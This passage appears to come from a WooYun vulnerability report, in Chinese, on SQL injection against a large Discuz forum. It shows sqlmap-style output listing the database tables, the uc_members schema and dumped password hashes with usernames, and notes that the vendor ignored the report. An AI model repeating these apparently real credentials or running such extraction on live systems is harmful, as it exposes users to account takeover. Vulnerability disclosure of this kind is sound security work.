 | mbbs_tradecomments                 |
 | mbbs_tradelog                      |
 | mbbs_tradeoptionvars               |
 | mbbs_trades                        |
 | mbbs_typemodels                    |
 | mbbs_typeoptions                   |
 | mbbs_typeoptionvars                |
 | mbbs_typevars                      |
 | mbbs_usergroups                    |
 | mbbs_validating                    |
 | mbbs_warnings                      |
 | mbbs_words                         |
 | nbbbs_access                       |
 | nbbbs_activities                   |
 | nbbbs_activityapplies              |
 | nbbbs_addons                       |
 | nbbbs_adminactions                 |
 | nbbbs_admincustom                  |
 | nbbbs_admingroups                  |
 | nbbbs_adminnotes                   |
 | nbbbs_adminsessions                |
 | nbbbs_advertisements               |
 | nbbbs_announcements                |
 | nbbbs_attachmentfields             |
 | nbbbs_attachments                  |
 | nbbbs_attachpaymentlog             |
 | nbbbs_attachtypes                  |
 | nbbbs_banned                       |
 | nbbbs_bbcodes                      |
 | nbbbs_caches                       |
 | nbbbs_creditslog                   |
 | nbbbs_crons                        |
 | nbbbs_debateposts                  |
 | nbbbs_debates                      |
 | nbbbs_failedlogins                 |
 | nbbbs_faqs                         |
 | nbbbs_favoriteforums               |
 | nbbbs_favorites                    |
 | nbbbs_favoritethreads              |
 | nbbbs_feeds                        |
 | nbbbs_forumfields                  |
 | nbbbs_forumlinks                   |
 | nbbbs_forumrecommend               |
 | nbbbs_forums                       |
 | nbbbs_imagetypes                   |
 | nbbbs_invites                      |
 | nbbbs_itempool                     |
 | nbbbs_magiclog                     |
 | nbbbs_magicmarket                  |
 | nbbbs_magics                       |
 | nbbbs_medallog                     |
 | nbbbs_medals                       |
 | nbbbs_memberfields                 |
 | nbbbs_membermagics                 |
 | nbbbs_memberrecommend              |
 | nbbbs_members                      |
 | nbbbs_memberspaces                 |
 | nbbbs_moderators                   |
 | nbbbs_modworks                     |
 | nbbbs_myposts                      |
 | nbbbs_mytasks                      |
 | nbbbs_mythreads                    |
 | nbbbs_navs                         |
 | nbbbs_onlinelist                   |
 | nbbbs_onlinetime                   |
 | nbbbs_orders                       |
 | nbbbs_paymentlog                   |
 | nbbbs_pluginhooks                  |
 | nbbbs_plugins                      |
 | nbbbs_pluginvars                   |
 | nbbbs_polloptions                  |
 | nbbbs_polls                        |
 | nbbbs_postposition                 |
 | nbbbs_posts                        |
 | nbbbs_profilefields                |
 | nbbbs_projects                     |
 | nbbbs_promotions                   |
 | nbbbs_prompt                       |
 | nbbbs_promptmsgs                   |
 | nbbbs_prompttype                   |
 | nbbbs_pushedthreads_copy           |
 | nbbbs_ranks                        |
 | nbbbs_ratelog                      |
 | nbbbs_regips                       |
 | nbbbs_relatedthreads               |
 | nbbbs_reportlog                    |
 | nbbbs_request                      |
 | nbbbs_rewardlog                    |
 | nbbbs_rsscaches                    |
 | nbbbs_searchindex                  |
 | nbbbs_sessions                     |
 | nbbbs_settings                     |
 | nbbbs_smilies                      |
 | nbbbs_spacecaches                  |
 | nbbbs_stats                        |
 | nbbbs_statvars                     |
 | nbbbs_styles                       |
 | nbbbs_stylevars                    |
 | nbbbs_tags                         |
 | nbbbs_tasks                        |
 | nbbbs_taskvars                     |
 | nbbbs_templates                    |
 | nbbbs_threads                      |
 | nbbbs_threadsmod                   |
 | nbbbs_threadtags                   |
 | nbbbs_threadtypes                  |
 | nbbbs_tradecomments                |
 | nbbbs_tradelog                     |
 | nbbbs_tradeoptionvars              |
 | nbbbs_trades                       |
 | nbbbs_typemodels                   |
 | nbbbs_typeoptions                  |
 | nbbbs_typeoptionvars               |
 | nbbbs_typevars                     |
 | nbbbs_usergroups                   |
 | nbbbs_validating                   |
 | nbbbs_warnings                     |
 | nbbbs_words                        |
 | pcbbs_access                       |
 | pcbbs_activities                   |
 | pcbbs_activityapplies              |
 | pcbbs_addons                       |
 | pcbbs_adminactions                 |
 | pcbbs_admincustom                  |
 | pcbbs_admingroups                  |
 | pcbbs_adminnotes                   |
 | pcbbs_adminsessions                |
 | pcbbs_advertisements               |
 | pcbbs_announcements                |
 | pcbbs_attachmentfields             |
 | pcbbs_attachments                  |
 | pcbbs_attachpaymentlog             |
 | pcbbs_attachtypes                  |
 | pcbbs_banned                       |
 | pcbbs_bbcodes                      |
 | pcbbs_caches                       |
 | pcbbs_creditslog                   |
 | pcbbs_crons                        |
 | pcbbs_debateposts                  |
 | pcbbs_debates                      |
 | pcbbs_failedlogins                 |
 | pcbbs_faqs                         |
 | pcbbs_favoriteforums               |
 | pcbbs_favorites                    |
 | pcbbs_favoritethreads              |
 | pcbbs_feeds                        |
 | pcbbs_forumfields                  |
 | pcbbs_forumlinks                   |
 | pcbbs_forumrecommend               |
 | pcbbs_forums                       |
 | pcbbs_imagetypes                   |
 | pcbbs_invites                      |
 | pcbbs_itempool                     |
 | pcbbs_magiclog                     |
 | pcbbs_magicmarket                  |
 | pcbbs_magics                       |
 | pcbbs_medallog                     |
 | pcbbs_medals                       |
 | pcbbs_memberfields                 |
 | pcbbs_membermagics                 |
 | pcbbs_memberrecommend              |
 | pcbbs_members                      |
 | pcbbs_memberspaces                 |
 | pcbbs_moderators                   |
 | pcbbs_modworks                     |
 | pcbbs_myposts                      |
 | pcbbs_mytasks                      |
 | pcbbs_mythreads                    |
 | pcbbs_navs                         |
 | pcbbs_onlinelist                   |
 | pcbbs_onlinetime                   |
 | pcbbs_orders                       |
 | pcbbs_paymentlog                   |
 | pcbbs_pluginhooks                  |
 | pcbbs_plugins                      |
 | pcbbs_pluginvars                   |
 | pcbbs_polloptions                  |
 | pcbbs_polls                        |
 | pcbbs_postposition                 |
 | pcbbs_posts                        |
 | pcbbs_profilefields                |
 | pcbbs_projects                     |
 | pcbbs_promotions                   |
 | pcbbs_prompt                       |
 | pcbbs_promptmsgs                   |
 | pcbbs_prompttype                   |
 | pcbbs_ranks                        |
 | pcbbs_ratelog                      |
 | pcbbs_regips                       |
 | pcbbs_relatedthreads               |
 | pcbbs_reportlog                    |
 | pcbbs_request                      |
 | pcbbs_rewardlog                    |
 | pcbbs_rsscaches                    |
 | pcbbs_searchindex                  |
 | pcbbs_sessions                     |
 | pcbbs_settings                     |
 | pcbbs_smilies                      |
 | pcbbs_spacecaches                  |
 | pcbbs_stats                        |
 | pcbbs_statvars                     |
 | pcbbs_styles                       |
 | pcbbs_stylevars                    |
 | pcbbs_tags                         |
 | pcbbs_tasks                        |
 | pcbbs_taskvars                     |
 | pcbbs_templates                    |
 | pcbbs_threads                      |
 | pcbbs_threadsmod                   |
 | pcbbs_threadtags                   |
 | pcbbs_threadtypes                  |
 | pcbbs_tradecomments                |
 | pcbbs_tradelog                     |
 | pcbbs_tradeoptionvars              |
 | pcbbs_trades                       |
 | pcbbs_typemodels                   |
 | pcbbs_typeoptions                  |
 | pcbbs_typeoptionvars               |
 | pcbbs_typevars                     |
 | pcbbs_usergroups                   |
 | pcbbs_validating                   |
 | pcbbs_warnings                     |
 | pcbbs_words                        |
 | pre_common_addon                   |
 | pre_common_admincp_cmenu           |
 | pre_common_admincp_group           |
 | pre_common_admincp_member          |
 | pre_common_admincp_perm            |
 | pre_common_admincp_session         |
 | pre_common_admingroup              |
 | pre_common_adminnote               |
 | pre_common_advertisement           |
 | pre_common_advertisement_custom    |
 | pre_common_banned                  |
 | pre_common_block                   |
 | pre_common_block_favorite          |
 | pre_common_block_item              |
 | pre_common_block_item_data         |
 | pre_common_block_permission        |
 | pre_common_block_pic               |
 | pre_common_block_style             |
 | pre_common_block_xml               |
 | pre_common_cache                   |
 | pre_common_card                    |
 | pre_common_card_log                |
 | pre_common_card_type               |
 | pre_common_credit_log              |
 | pre_common_credit_rule             |
 | pre_common_credit_rule_log         |
 | pre_common_credit_rule_log_field   |
 | pre_common_cron                    |
 | pre_common_district                |
 | pre_common_diy_data                |
 | pre_common_domain                  |
 | pre_common_failedlogin             |
 | pre_common_friendlink              |
 | pre_common_grouppm                 |
 | pre_common_invite                  |
 | pre_common_magic                   |
 | pre_common_magiclog                |
 | pre_common_mailcron                |
 | pre_common_mailqueue               |
 | pre_common_member                  |
 | pre_common_member_action_log       |
 | pre_common_member_connect          |
 | pre_common_member_count            |
 | pre_common_member_field_forum      |
 | pre_common_member_field_home       |
 | pre_common_member_grouppm          |
 | pre_common_member_log              |
 | pre_common_member_magic            |
 | pre_common_member_profile          |
 | pre_common_member_profile_setting  |
 | pre_common_member_security         |
 | pre_common_member_stat_field       |
 | pre_common_member_stat_fieldcache  |
 | pre_common_member_stat_search      |
 | pre_common_member_stat_searchcache |
 | pre_common_member_status           |
 | pre_common_member_validate         |
 | pre_common_member_verify           |
 | pre_common_member_verify_info      |
 | pre_common_moderate                |
 | pre_common_myapp                   |
 | pre_common_myinvite                |
 | pre_common_mytask                  |
 | pre_common_nav                     |
 | pre_common_onlinetime              |
 | pre_common_plugin                  |
 | pre_common_pluginvar               |
 | pre_common_process                 |
 | pre_common_regip                   |
 | pre_common_relatedlink             |
 | pre_common_report                  |
 | pre_common_searchindex             |
 | pre_common_secquestion             |
 | pre_common_session                 |
 | pre_common_setting                 |
 | pre_common_smiley                  |
 | pre_common_sphinxcounter           |
 | pre_common_stat                    |
 | pre_common_statuser                |
 | pre_common_style                   |
 | pre_common_stylevar                |
 | pre_common_syscache                |
 | pre_common_tag                     |
 | pre_common_tagitem                 |
 | pre_common_task                    |
 | pre_common_taskvar                 |
 | pre_common_template                |
 | pre_common_template_block          |
 | pre_common_template_permission     |
 | pre_common_uin_black               |
 | pre_common_usergroup               |
 | pre_common_usergroup_field         |
 | pre_common_word                    |
 | pre_common_word_type               |
 | pre_connect_feedlog                |
 | pre_connect_memberbindlog          |
 | pre_connect_tlog                   |
 | pre_forum_access                   |
 | pre_forum_activity                 |
 | pre_forum_activityapply            |
 | pre_forum_announcement             |
 | pre_forum_attachment               |
 | pre_forum_attachment_0             |
 | pre_forum_attachment_1             |
 | pre_forum_attachment_2             |
 | pre_forum_attachment_3             |
 | pre_forum_attachment_4             |
 | pre_forum_attachment_5             |
 | pre_forum_attachment_6             |
 | pre_forum_attachment_7             |
 | pre_forum_attachment_8             |
 | pre_forum_attachment_9             |
 | pre_forum_attachment_unused        |
 | pre_forum_attachtype               |
 | pre_forum_bbcode                   |
 | pre_forum_creditslog               |
 | pre_forum_debate                   |
 | pre_forum_debatepost               |
 | pre_forum_faq                      |
 | pre_forum_forum                    |
 | pre_forum_forum_threadtable        |
 | pre_forum_forumfield               |
 | pre_forum_forumrecommend           |
 | pre_forum_groupcreditslog          |
 | pre_forum_groupfield               |
 | pre_forum_groupinvite              |
 | pre_forum_grouplevel               |
 | pre_forum_groupranking             |
 | pre_forum_groupuser                |
 | pre_forum_imagetype                |
 | pre_forum_medal                    |
 | pre_forum_medallog                 |
 | pre_forum_memberrecommend          |
 | pre_forum_moderator                |
 | pre_forum_modwork                  |
 | pre_forum_onlinelist               |
 | pre_forum_order                    |
 | pre_forum_poll                     |
 | pre_forum_polloption               |
 | pre_forum_pollvoter                |
 | pre_forum_post                     |
 | pre_forum_post_tableid             |
 | pre_forum_postcomment              |
 | pre_forum_postlog                  |
 | pre_forum_postposition             |
 | pre_forum_poststick                |
 | pre_forum_promotion                |
 | pre_forum_ratelog                  |
 | pre_forum_relatedthread            |
 | pre_forum_replycredit              |
 | pre_forum_rsscache                 |
 | pre_forum_spacecache               |
 | pre_forum_statlog                  |
 | pre_forum_thread                   |
 | pre_forum_threadclass              |
 | pre_forum_threadimage              |
 | pre_forum_threadlog                |
 | pre_forum_threadmod                |
 | pre_forum_threadpartake            |
 | pre_forum_threadrush               |
 | pre_forum_threadtype               |
 | pre_forum_trade                    |
 | pre_forum_tradecomment             |
 | pre_forum_tradelog                 |
 | pre_forum_typeoption               |
 | pre_forum_typeoptionvar            |
 | pre_forum_typevar                  |
 | pre_forum_warning                  |
 | pre_home_album                     |
 | pre_home_album_category            |
 | pre_home_appcreditlog              |
 | pre_home_blacklist                 |
 | pre_home_blog                      |
 | pre_home_blog_category             |
 | pre_home_blogfield                 |
 | pre_home_class                     |
 | pre_home_click                     |
 | pre_home_clickuser                 |
 | pre_home_comment                   |
 | pre_home_docomment                 |
 | pre_home_doing                     |
 | pre_home_favorite                  |
 | pre_home_feed                      |
 | pre_home_feed_app                  |
 | pre_home_friend                    |
 | pre_home_friend_request            |
 | pre_home_friendlog                 |
 | pre_home_notification              |
 | pre_home_pic                       |
 | pre_home_picfield                  |
 | pre_home_poke                      |
 | pre_home_pokearchive               |
 | pre_home_share                     |
 | pre_home_show                      |
 | pre_home_specialuser               |
 | pre_home_userapp                   |
 | pre_home_userappfield              |
 | pre_home_viewlog                   |
 | pre_home_visitor                   |
 | pre_myrepeats                      |
 | pre_portal_article_content         |
 | pre_portal_article_count           |
 | pre_portal_article_related         |
 | pre_portal_article_title           |
 | pre_portal_article_trash           |
 | pre_portal_attachment              |
 | pre_portal_category                |
 | pre_portal_category_permission     |
 | pre_portal_comment                 |
 | pre_portal_rsscache                |
 | pre_portal_topic                   |
 | pre_portal_topic_pic               |
 | pre_tools_censorhome               |
 | pre_tools_rule                     |
 | user4                              |
 | xbbs_access                        |
 | xbbs_activities                    |
 | xbbs_activityapplies               |
 | xbbs_addons                        |
 | xbbs_adminactions                  |
 | xbbs_admincustom                   |
 | xbbs_admingroups                   |
 | xbbs_adminnotes                    |
 | xbbs_adminsessions                 |
 | xbbs_advertisements                |
 | xbbs_announcements                 |
 | xbbs_attachmentfields              |
 | xbbs_attachments                   |
 | xbbs_attachpaymentlog              |
 | xbbs_attachtypes                   |
 | xbbs_banned                        |
 | xbbs_bbcodes                       |
 | xbbs_caches                        |
 | xbbs_creditslog                    |
 | xbbs_crons                         |
 | xbbs_debateposts                   |
 | xbbs_debates                       |
 | xbbs_failedlogins                  |
 | xbbs_faqs                          |
 | xbbs_favoriteforums                |
 | xbbs_favorites                     |
 | xbbs_favoritethreads               |
 | xbbs_feeds                         |
 | xbbs_forumfields                   |
 | xbbs_forumlinks                    |
 | xbbs_forumrecommend                |
 | xbbs_forums                        |
 | xbbs_imagetypes                    |
 | xbbs_invites                       |
 | xbbs_itempool                      |
 | xbbs_magiclog                      |
 | xbbs_magicmarket                   |
 | xbbs_magics                        |
 | xbbs_medallog                      |
 | xbbs_medals                        |
 | xbbs_memberfields                  |
 | xbbs_membermagics                  |
 | xbbs_memberrecommend               |
 | xbbs_members                       |
 | xbbs_memberspaces                  |
 | xbbs_moderators                    |
 | xbbs_modworks                      |
 | xbbs_myposts                       |
 | xbbs_mytasks                       |
 | xbbs_mythreads                     |
 | xbbs_navs                          |
 | xbbs_onlinelist                    |
 | xbbs_onlinetime                    |
 | xbbs_orders                        |
 | xbbs_paymentlog                    |
 | xbbs_pluginhooks                   |
 | xbbs_plugins                       |
 | xbbs_pluginvars                    |
 | xbbs_polloptions                   |
 | xbbs_polls                         |
 | xbbs_postposition                  |
 | xbbs_posts                         |
 | xbbs_profilefields                 |
 | xbbs_projects                      |
 | xbbs_promotions                    |
 | xbbs_prompt                        |
 | xbbs_promptmsgs                    |
 | xbbs_prompttype                    |
 | xbbs_ranks                         |
 | xbbs_ratelog                       |
 | xbbs_regips                        |
 | xbbs_relatedthreads                |
 | xbbs_reportlog                     |
 +------------------------------------+
 Database: newbbs
 Table: uc_members
 [13 columns]
 +---------------+-----------------------+
 | Column        | Type                  |
 +---------------+-----------------------+
 | email         | char(32)              |
 | isactive      | tinyint(1)            |
 | lastloginip   | char(15)              |
 | lastlogintime | int(10) unsigned      |
 | myid          | char(30)              |
 | myidkey       | char(16)              |
 | password      | char(32)              |
 | regdate       | int(10) unsigned      |
 | regip         | char(15)              |
 | salt          | char(6)               |
 | secques       | char(8)               |
 | uid           | mediumint(8) unsigned |
 | username      | char(15)              |
 +---------------+-----------------------+

uc_members的表。

code 区域 
[22:42:34] [INFO] the SQL query used returns 2460210 entries
 due to huge table size do you want to remove ORDER BY clause gaining speed over
 consistency? [y/N] N
 [22:42:40] [INFO] retrieved: 000009112cb0c06feae43a4635f5dfd1
 [22:42:42] [INFO] retrieved: zkwen
 [22:42:45] [INFO] retrieved: 00000a3f5af8f0d84e87a5e4d7179da6
 [22:42:47] [INFO] retrieved: caizhizhi
 [22:42:50] [INFO] retrieved: 000017b39f6c2d0bcc06c16641a9df4b
 [22:42:52] [INFO] retrieved: ghost2005
 [22:42:55] [INFO] retrieved: 0000180e94707c0d90547614c17076bf

同样有200W数据。

漏洞证明:

code 区域 
[22:42:34] [INFO] the SQL query used returns 2460210 entries
 due to huge table size do you want to remove ORDER BY clause gaining speed over
 consistency? [y/N] N
 [22:42:40] [INFO] retrieved: 000009112cb0c06feae43a4635f5dfd1
 [22:42:42] [INFO] retrieved: zkwen
 [22:42:45] [INFO] retrieved: 00000a3f5af8f0d84e87a5e4d7179da6
 [22:42:47] [INFO] retrieved: caizhizhi
 [22:42:50] [INFO] retrieved: 000017b39f6c2d0bcc06c16641a9df4b
 [22:42:52] [INFO] retrieved: ghost2005
 [22:42:55] [INFO] retrieved: 0000180e94707c0d90547614c17076bf

修复方案:

可以选择过滤参数

版权声明:转载请注明来源 老和尚@乌云

漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2014-10-31 22:48

厂商回复:

漏洞Rank:15 (WooYun评价)

最新状态:

暂无

漏洞评价:

对本漏洞信息进行评价,以更好的反馈信息的价值,包括信息客观性,内容是否完整以及是否具备学习价值

漏洞评价(共0人评价):

登陆后才能进行评分

评价

  1. 2014-10-30 10:52 | 老和尚 ( 普通白帽子 | Rank:223 漏洞数:45 )

    2

    @finger 哥,帮我催催厂商吧

  2. 2014-11-01 00:08 | 老和尚 ( 普通白帽子 | Rank:223 漏洞数:45 )

    1

    妹的。过千万都敢忽略,有本事别修复

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin